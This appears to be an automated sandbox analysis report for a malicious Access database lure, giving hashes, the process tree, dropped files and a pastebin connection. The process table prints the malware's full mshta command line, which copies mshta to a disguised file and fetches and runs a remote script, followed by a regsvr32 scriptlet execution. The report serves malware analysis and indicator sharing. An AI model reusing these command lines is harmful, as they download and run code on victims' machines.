File name: | Leaked_Records_15072019_Col.accdb |
Full analysis: | https://app.any.run/tasks/0cf1b497-8ce2-4b5a-9656-6faab4a4f48e |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 13:56:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-msaccess |
File info: | Microsoft Access Database |
MD5: | BEFC603B7E59E0B739AE150FFC0CAD3A |
SHA1: | 4BF499C320E6806E877E68876A3BEB2ADA2A45AC |
SHA256: | 7C02D2F27147C49030C0619D1D313CFA24234F789E149B2E3D1478400496A32C |
SSDEEP: | 1536:DAQxNqc6lh3WHzVdGduAixBQdpdzdmdudJ:DAQxNqc6lsfkuAixAjJEcJ |
.accdb | | | Microsoft Access 2007 Database (90.4) |
---|---|---|
.pi2 | | | DEGAS med-res bitmap (9.5) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3704 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\Leaked_Records_15072019_Col.accdb | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2296 | "C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE" /NOSTARTUP "C:\Users\admin\Desktop\Leaked_Records_15072019_Col.accdb" | C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE | rundll32.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Access Exit code: 0 Version: 14.0.6024.1000 | ||||
3620 | "C:\Windows\System32\mshta.exe" javascript:eval(new%20ActiveXObject("Scripting.FileSystemObject").CopyFile%20("c:\\windows\\system32\\mshta.exe",%20new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil.exe"));eval(new%20ActiveXObject("Wscript.Shell").Run(new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil%20javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();"));close(); | C:\Windows\System32\mshta.exe | MSACCESS.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2064 | "C:\Users\admin\AppData\Local\Microsoft\cutil.exe" javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close(); | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3588 | "C:\Windows\System32\regsvr32.exe" /u /n /s /i:C:\Users\admin\AppData\Local\logs.tmp scrobj.dll | C:\Windows\System32\regsvr32.exe | — | cutil.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 5 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\CVRF6D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\~DF1D1212693DF4D212.TMP | — | |
MD5:— | SHA256:— | |||
2296 | MSACCESS.EXE | C:\Users\admin\Desktop\Leaked_Records_15072019_Col.laccdb | — | |
MD5:— | SHA256:— | |||
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.ldb | — | |
MD5:— | SHA256:— | |||
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Leaked_Records_15072019_Col.accdb.LNK | lnk | |
MD5:77923180D16AEB9F018769FAE5E86513 | SHA256:CD2752DEA7C9DDCCC358B7CDB2AA0ED68E8A4CF607E16D1D483028926F3E8EB4 | |||
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw | mdw | |
MD5:7304E00D382D4624140D92952F8BB219 | SHA256:D65513DB2DFAB8495CFBF35A24D89CB5A8274B7519DB5C9AB6FA5FAE565E8E56 | |||
2064 | cutil.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\viwSRB6M[1].txt | xml | |
MD5:3739532BDF9B523E245EEEDD062AB5FF | SHA256:544C113236191E588D7679CB9168C5D45A8D4736B5D08217BE1C66DED4F468F3 | |||
2064 | cutil.exe | C:\Users\admin\AppData\Local\temp.tmp | executable | |
MD5:91456160503D1965136BBE939606878E | SHA256:350CDEC0802FB24B9AA93CF44C318DCC12BBAF2D85B0E43D0142C54690A18138 | |||
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\Database.lnk | lnk | |
MD5:31AEFA424BD036B40F8B9B64C1C9F78F | SHA256:67106A3278F63805F941D515BE4A40EA1DB3F0D926A4C9A8C71376F10E5EED26 | |||
2064 | cutil.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:C939488752FEF70DDE2977B4E5F4D58F | SHA256:3D9EA4BAF4FF97B12C959D2D81776DC96F1E181F5878008BEA28E3D4C9F49656 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2064 | cutil.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
Process | Message |
---|---|
MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw |